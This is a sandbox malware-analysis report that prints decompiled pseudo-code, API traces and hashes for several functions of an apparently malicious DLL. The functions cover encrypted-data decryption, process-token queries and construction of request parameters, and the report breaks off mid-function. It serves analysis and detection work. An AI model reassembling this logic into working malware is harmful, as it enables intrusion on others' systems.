                    
                    				_t42 = __eax;
                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                    				_t38 = __eax;
                    				_t30 = RtlAllocateHeap( *0x10ca2d8, 0, (__eax >> 3) + __eax + 1);
                    				_v12 = _t30;
                    				if(_t30 != 0) {
                    					_v8 = _t42;
                    					do {
                    						_t33 = 0x18;
                    						if(_t38 <= _t33) {
                    							_t33 = _t38;
                    						}
                    						_t21 =  *0x10ca2f0; // 0xcb191711
                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                    						 *0x10ca2f0 = _t23;
                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                    						memcpy(_t30, _v8, _t45);
                    						_v8 = _v8 + _t45;
                    						_t27 = _t30 + _t45;
                    						_t38 = _t38 - _t45;
                    						_t46 = _t46 + 0xc;
                    						 *_t27 = 0x2f;
                    						_t13 = _t27 + 1; // 0x1
                    						_t30 = _t13;
                    					} while (_t38 > 8);
                    					memcpy(_t30, _v8, _t38 + 1);
                    				}
                    				return _v12;
                    			}


















                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,010C194D,00000000,?,?,010C6ABB,?,037A95B0), ref: 010C5AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 010C5AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,010C194D,00000000,?,?,010C6ABB,?,037A95B0), ref: 010C5B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 010C5B55
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: 073484738f6e7bc06dcaae00df6a098c40950ae7f531d1db75727ca4f35794f2
                    • Instruction ID: c4d98ad136197813e0e8049530439d13190a1c440b7993fc3efd69da7b1b23fc
                    • Opcode Fuzzy Hash: 073484738f6e7bc06dcaae00df6a098c40950ae7f531d1db75727ca4f35794f2
                    • Instruction Fuzzy Hash: 57110A72B00129AFC7208B69DC84D9EBFFEEB90650B1401A9F54597180F6759E04CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C6156(void* __esi) {
                    				struct _SECURITY_ATTRIBUTES* _v4;
                    				void* _t8;
                    				void* _t10;
                    
                    				_v4 = 0;
                    				memset(__esi, 0, 0x38);
                    				_t8 = CreateEventA(0, 1, 0, 0);
                    				 *(__esi + 0x1c) = _t8;
                    				if(_t8 != 0) {
                    					_t10 = CreateEventA(0, 1, 1, 0);
                    					 *(__esi + 0x20) = _t10;
                    					if(_t10 == 0) {
                    						CloseHandle( *(__esi + 0x1c));
                    					} else {
                    						_v4 = 1;
                    					}
                    				}
                    				return _v4;
                    			}







                    APIs
                    • memset.NTDLL ref: 010C6164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 010C6179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 010C6186
                    • CloseHandle.KERNEL32(?), ref: 010C6198
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: e722629c7b41103b8d7b7a7967b67becf14f7ca7f9222a3fe5a5a08fe9235ba0
                    • Instruction ID: dfb9f269f8c158d8adcf353d56060438fac56dfcec63c9857f8daf6880458458
                    • Opcode Fuzzy Hash: e722629c7b41103b8d7b7a7967b67becf14f7ca7f9222a3fe5a5a08fe9235ba0
                    • Instruction Fuzzy Hash: 6CF0DAB110430CAFD2205F26DC8082BBBADFB85699B25496DB58691642DA76A8168F70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C137B() {
                    				void* _t1;
                    				intOrPtr _t5;
                    				void* _t6;
                    				void* _t7;
                    				void* _t11;
                    
                    				_t1 =  *0x10ca30c; // 0x2d4
                    				if(_t1 == 0) {
                    					L8:
                    					return 0;
                    				}
                    				SetEvent(_t1);
                    				_t11 = 0x7fffffff;
                    				while(1) {
                    					SleepEx(0x64, 1);
                    					_t5 =  *0x10ca358; // 0x0
                    					if(_t5 == 0) {
                    						break;
                    					}
                    					_t11 = _t11 - 0x64;
                    					if(_t11 > 0) {
                    						continue;
                    					}
                    					break;
                    				}
                    				_t6 =  *0x10ca30c; // 0x2d4
                    				if(_t6 != 0) {
                    					CloseHandle(_t6);
                    				}
                    				_t7 =  *0x10ca2d8; // 0x33b0000
                    				if(_t7 != 0) {
                    					HeapDestroy(_t7);
                    				}
                    				goto L8;
                    			}









                    APIs
                    • SetEvent.KERNEL32(000002D4,00000001,010C10AA), ref: 010C1386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 010C1395
                    • CloseHandle.KERNEL32(000002D4), ref: 010C13B6
                    • HeapDestroy.KERNEL32(033B0000), ref: 010C13C6
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 4c3133b29741b6def42e497bb0aee97a8117fe91c0f54fac7ca0833c1c6b1da1
                    • Instruction ID: 42fca92d0a04d2b220885b0cfaab1542f8f62714e328f90501679feab61f7dc1
                    • Opcode Fuzzy Hash: 4c3133b29741b6def42e497bb0aee97a8117fe91c0f54fac7ca0833c1c6b1da1
                    • Instruction Fuzzy Hash: 15F01235B01211DFE7309B7DD85CB5A3BE8AB44B59B148554BDC0E368AEA7AC4409F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C5231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                    				struct _FILETIME _v12;
                    				void* _t11;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				signed short* _t24;
                    
                    				_t22 = __edx;
                    				_t23 = E010C5406(_t11, _a12);
                    				if(_t23 == 0) {
                    					_t20 = 8;
                    				} else {
                    					_t24 = _t23 + _a16 * 2;
                    					 *_t24 =  *_t24 & 0x00000000;
                    					_t20 = E010C15E6(__ecx, _a4, _a8, _t23);
                    					if(_t20 == 0) {
                    						GetSystemTimeAsFileTime( &_v12);
                    						 *_t24 = 0x5f;
                    						_t20 = E010C5B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                    					}
                    					HeapFree( *0x10ca2d8, 0, _t23);
                    				}
                    				return _t20;
                    			}










                    APIs
                      • Part of subcall function 010C5406: lstrlen.KERNEL32(?,00000000,037A9D58,00000000,010C3C77,037A9F7B,69B25F44,?,?,?,?,69B25F44,00000005,010CA00C,4D283A53,?), ref: 010C540D
                      • Part of subcall function 010C5406: mbstowcs.NTDLL ref: 010C5436
                      • Part of subcall function 010C5406: memset.NTDLL ref: 010C5448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,037A93CC), ref: 010C5268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,037A93CC), ref: 010C5295
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: a7054991b0f2ab859746a8a5528d7ac52525a858d9e938a206a68739b64f6cb8
                    • Instruction ID: 553c06c57c329264ccc6cbd0b675b5c3eca0719181e4938fde510235aef38c9d
                    • Opcode Fuzzy Hash: a7054991b0f2ab859746a8a5528d7ac52525a858d9e938a206a68739b64f6cb8
                    • Instruction Fuzzy Hash: AC018F3620020ABFDB215F98DC44F9E7FB9FB85B04F104029FA8096191EB72E915DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E010C395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                    				intOrPtr* _v8;
                    				void* _t17;
                    				intOrPtr* _t22;
                    				void* _t27;
                    				char* _t30;
                    				void* _t33;
                    				void* _t34;
                    				void* _t36;
                    				void* _t37;
                    				void* _t39;
                    				int _t42;
                    
                    				_t17 = __eax;
                    				_t37 = 0;
                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                    				_t2 = _t17 + 1; // 0x1
                    				_t28 = _t2;
                    				_t34 = E010C63FD(_t2);
                    				if(_t34 != 0) {
                    					_t30 = E010C63FD(_t28);
                    					if(_t30 == 0) {
                    						E010C17AB(_t34);
                    					} else {
                    						_t39 = _a4;
                    						_t22 = E010C799A(_t39);
                    						_v8 = _t22;
                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                    							_a4 = _t39;
                    						} else {
                    							_t26 = _t22 + 2;
                    							_a4 = _t22 + 2;
                    							_t22 = E010C799A(_t26);
                    							_v8 = _t22;
                    						}
                    						if(_t22 == 0) {
                    							__imp__(_t34, _a4);
                    							 *_t30 = 0x2f;
                    							 *((char*)(_t30 + 1)) = 0;
                    						} else {
                    							_t42 = _t22 - _a4;
                    							memcpy(_t34, _a4, _t42);
                    							 *((char*)(_t34 + _t42)) = 0;
                    							__imp__(_t30, _v8);
                    						}
                    						 *_a8 = _t34;
                    						_t37 = 1;
                    						 *_a12 = _t30;
                    					}
                    				}
                    				return _t37;
                    			}















                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?,?,00000000), ref: 010C3967
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                      • Part of subcall function 010C799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010C3995,00000000,00000001,00000001,?,?,010C43F7,?,?,?,?,00000102), ref: 010C79A8
                      • Part of subcall function 010C799A: StrChrA.SHLWAPI(?,0000003F,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?,?,00000000,00000000), ref: 010C79B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?), ref: 010C39C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C39D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C39E1
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: 0b9bcdfa31dcfbca1dee610e316ed6cc77882b5518cf843431a7745e996c093f
                    • Instruction ID: 4d242e30e20ccb23ab0bf9ef50fd3878b69d61b4f92b1901d987b0e3968f0cba
                    • Opcode Fuzzy Hash: 0b9bcdfa31dcfbca1dee610e316ed6cc77882b5518cf843431a7745e996c093f
                    • Instruction Fuzzy Hash: D721A272500256EFCB129F68C884AEEBFF8FF15A44F058098F9899F201D635C900CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				void* _v8;
                    				void* _t18;
                    				int _t25;
                    				int _t29;
                    				int _t34;
                    
                    				_t29 = lstrlenW(_a4);
                    				_t25 = lstrlenW(_a8);
                    				_t18 = E010C63FD(_t25 + _t29 + _t25 + _t29 + 2);
                    				_v8 = _t18;
                    				if(_t18 != 0) {
                    					_t34 = _t29 + _t29;
                    					memcpy(_t18, _a4, _t34);
                    					_t10 = _t25 + 2; // 0x2
                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                    				}
                    				return _v8;
                    			}









                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,037A93CC,?,010C3418,004F0053,037A93CC,?,?,?,?,?,?,010C54F9), ref: 010C115D
                    • lstrlenW.KERNEL32(010C3418,?,010C3418,004F0053,037A93CC,?,?,?,?,?,?,010C54F9), ref: 010C1164
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,010C3418,004F0053,037A93CC,?,?,?,?,?,?,010C54F9), ref: 010C1184
                    • memcpy.NTDLL(74E069A0,010C3418,00000002,00000000,004F0053,74E069A0,?,?,010C3418,004F0053,037A93CC), ref: 010C1197
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 85d4136b519fc6635971de64a92205bebc89d57a5ba338ffd46573b17d57664c
                    • Instruction ID: 9828c01a5df7b47b2feed752312ef2a82261f6264cae7dff67042411cef9acb7
                    • Opcode Fuzzy Hash: 85d4136b519fc6635971de64a92205bebc89d57a5ba338ffd46573b17d57664c
                    • Instruction Fuzzy Hash: 4DF03C72900119FB8F11DFA8CC44CDF7BECEF18254B114066A908D7201E671EA148FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlen.KERNEL32(037A9B50,00000000,00000000,7691C740,010C6AE6,00000000), ref: 010C253A
                    • lstrlen.KERNEL32(?), ref: 010C2542
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • lstrcpy.KERNEL32(00000000,037A9B50), ref: 010C2556
                    • lstrcat.KERNEL32(00000000,?), ref: 010C2561
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: 00182d90d118327e911d7bf7d9485105da8e4e76ec81fa4bbbdd263ff561dead
                    • Instruction ID: bd28afd0fe2a53df1810600cccc6f5ed5365d536664ab39cca3bf13b8e19aac5
                    • Opcode Fuzzy Hash: 00182d90d118327e911d7bf7d9485105da8e4e76ec81fa4bbbdd263ff561dead
                    • Instruction Fuzzy Hash: 22E09B735011619F87215BE89C48C9FBBACFF99710704045AF680D3104C72A8801CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 58%
                    			E04F94872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				int _v8;
                    				long* _v12;
                    				int _v16;
                    				BYTE* _v20;
                    				long* _v24;
                    				void* _v39;
                    				char _v40;
                    				void _v56;
                    				int _v60;
                    				intOrPtr _v64;
                    				void _v67;
                    				char _v68;
                    				void* _t61;
                    				int _t68;
                    				signed int _t76;
                    				int _t79;
                    				int _t81;
                    				int _t85;
                    				long _t86;
                    				int _t90;
                    				signed int _t94;
                    				int _t101;
                    				BYTE* _t102;
                    				int _t103;
                    				void* _t104;
                    				void* _t105;
                    				void* _t106;
                    
                    				_t103 = __eax;
                    				_t94 = 6;
                    				_v68 = 0;
                    				memset( &_v67, 0, _t94 << 2);
                    				_t105 = _t104 + 0xc;
                    				asm("stosw");
                    				asm("stosb");
                    				_v40 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				asm("stosb");
                    				_t61 =  *0x4f9a0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                    				if(_t61 == 0) {
                    					_a8 = GetLastError();
                    				} else {
                    					_t101 = 0x10;
                    					memcpy( &_v56, _a8, _t101);
                    					_t106 = _t105 + 0xc;
                    					_v60 = _t101;
                    					_v67 = 2;
                    					_v64 = 0x660e;
                    					_v68 = 8;
                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                    					if(_t68 == 0) {
                    						_a8 = GetLastError();
                    					} else {
                    						_push(0);
                    						_push( &_v40);
                    						_push(1);
                    						_push(_v12);
                    						if( *0x4f9a0c4() == 0) {
                    							_a8 = GetLastError();
                    						} else {
                    							_t18 = _t103 + 0xf; // 0x11f
                    							_t76 = _t18 & 0xfffffff0;
                    							if(_a4 != 0 && _t76 == _t103) {
                    								_t76 = _t76 + _t101;
                    							}
                    							_t102 = E04F963FD(_t76);
                    							_v20 = _t102;
                    							if(_t102 == 0) {
                    								_a8 = 8;
                    							} else {
                    								_v16 = 0;
                    								_a8 = 0;
                    								while(1) {
                    									_t79 = 0x10;
                    									_v8 = _t79;
                    									if(_t103 <= _t79) {
                    										_v8 = _t103;
                    									}
                    									memcpy(_t102, _a12, _v8);
                    									_t81 = _v8;
                    									_a12 = _a12 + _t81;
                    									_t103 = _t103 - _t81;
                    									_t106 = _t106 + 0xc;
                    									if(_a4 == 0) {
                    										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                    									} else {
                    										_t85 =  *0x4f9a0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                    									}
                    									if(_t85 == 0) {
                    										break;
                    									}
                    									_t90 = _v8;
                    									_v16 = _v16 + _t90;
                    									_t102 =  &(_t102[_t90]);
                    									if(_t103 != 0) {
                    										continue;
                    									} else {
                    										L17:
                    										 *_a16 = _v20;
                    										 *_a20 = _v16;
                    									}
                    									goto L21;
                    								}
                    								_t86 = GetLastError();
                    								_a8 = _t86;
                    								if(_t86 != 0) {
                    									E04F917AB(_v20);
                    								} else {
                    									goto L17;
                    								}
                    							}
                    						}
                    						L21:
                    						CryptDestroyKey(_v12);
                    					}
                    					CryptReleaseContext(_v24, 0);
                    				}
                    				return _a8;
                    			}

                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04F93AC6), ref: 04F948AA
                    • memcpy.NTDLL(?,04F93AC6,00000010,?,?,?,?,?,?,?,?,?,?,04F960F5,00000000,04F94DD9), ref: 04F948C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04F948EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04F94904
                    • memcpy.NTDLL(00000000,04F94DD9,04F93AC6,0000011F), ref: 04F94956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04F93AC6,00000020,?,?,0000011F), ref: 04F9497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04F93AC6,?,?,0000011F), ref: 04F94996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 04F949AE
                    • GetLastError.KERNEL32 ref: 04F949E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 04F949EC
                    • GetLastError.KERNEL32 ref: 04F949F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04F94A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04F960F5,00000000,04F94DD9,04F93AC6,?,04F93AC6), ref: 04F94A09
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: 0760b87e35a85635e67a116f31595b7ba4717bdd1f5d1d471538f1f2f2e65814
                    • Instruction ID: 295b937aa2cad01695c0702c2d98ca8f788dae6f4de99cd5f128a76facad37f5
                    • Opcode Fuzzy Hash: 0760b87e35a85635e67a116f31595b7ba4717bdd1f5d1d471538f1f2f2e65814
                    • Instruction Fuzzy Hash: B5515B72D04208BFEF11DFA9DC84AAEBBF8EB44354F004429F915E6250E774AE56DB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E04F977BB(char _a4, void* _a8) {
                    				void* _v8;
                    				void* _v12;
                    				char _v16;
                    				void* _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				void* _v44;
                    				void** _t33;
                    				void* _t40;
                    				void* _t43;
                    				void** _t44;
                    				intOrPtr* _t47;
                    				char _t48;
                    
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v20 = _a4;
                    				_t48 = 0;
                    				_v16 = 0;
                    				_a4 = 0;
                    				_v44 = 0x18;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v28 = 0;
                    				_v24 = 0;
                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                    					_t33 =  &_v8;
                    					__imp__(_v12, 8, _t33);
                    					if(_t33 >= 0) {
                    						_t47 = __imp__;
                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                    						_t44 = E04F963FD(_a4);
                    						if(_t44 != 0) {
                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                    							if(_t40 >= 0) {
                    								memcpy(_a8,  *_t44, 0x1c);
                    								_t48 = 1;
                    							}
                    							E04F917AB(_t44);
                    						}
                    						NtClose(_v8); // executed
                    					}
                    					NtClose(_v12);
                    				}
                    				return _t48;
                    			}

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04F97802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04F97815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F97831
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F9784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 04F9785B
                    • NtClose.NTDLL(?), ref: 04F9786D
                    • NtClose.NTDLL(00000000), ref: 04F97877
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: 05f948c14960dc5980446c69418f8fa957a41e9f0651f436bb2851aa886a6065
                    • Instruction ID: 419861077e293ee5034bb9786067033ae499ea32fa6a758f91e8c5b7c4fa37f1
                    • Opcode Fuzzy Hash: 05f948c14960dc5980446c69418f8fa957a41e9f0651f436bb2851aa886a6065
                    • Instruction Fuzzy Hash: C921E7B291021CBBEF01AF95DC45EDEBFBDEB08740F104066F905A6260D7B19E45DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E04F968EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				void* _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v52;
                    				void* __ecx;
                    				void* __edi;
                    				long _t29;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				void* _t37;
                    				intOrPtr _t38;
                    				int _t41;
                    				void* _t42;
                    				intOrPtr _t46;
                    				intOrPtr _t47;
                    				intOrPtr _t54;
                    				intOrPtr _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr _t66;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				intOrPtr _t78;
                    				int _t81;
                    				intOrPtr _t82;
                    				int _t85;
                    				intOrPtr _t87;
                    				int _t90;
                    				intOrPtr _t92;
                    				int _t95;
                    				intOrPtr* _t97;
                    				intOrPtr* _t98;
                    				void* _t99;
                    				void* _t103;
                    				void* _t104;
                    				void* _t105;
                    				intOrPtr _t106;
                    				void* _t108;
                    				int _t109;
                    				void* _t110;
                    				void* _t111;
                    				void* _t113;
                    				void* _t114;
                    				void* _t116;
                    
                    				_t103 = __edx;
                    				_t29 = __eax;
                    				_t113 = _a20;
                    				_v4 = 8;
                    				if(__eax == 0) {
                    					_t29 = GetTickCount();
                    				}
                    				_t30 =  *0x4f9a018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t31 =  *0x4f9a014; // 0x3a87c8cd
                    				asm("bswap eax");
                    				_t32 =  *0x4f9a010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t33 =  *0x4f9a00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t34 =  *0x4f9a320; // 0xb2d5a8
                    				_t3 = _t34 + 0x4f9b633; // 0x74666f73
                    				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x4f9a02c,  *0x4f9a004, _t29);
                    				_t37 = E04F94B2C();
                    				_t38 =  *0x4f9a320; // 0xb2d5a8
                    				_t4 = _t38 + 0x4f9b673; // 0x74707526
                    				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                    				_t116 = _t114 + 0x38;
                    				_t110 = _t109 + _t41;
                    				if(_a24 != 0) {
                    					_t92 =  *0x4f9a320; // 0xb2d5a8
                    					_t8 = _t92 + 0x4f9b67e; // 0x732526
                    					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                    					_t116 = _t116 + 0xc;
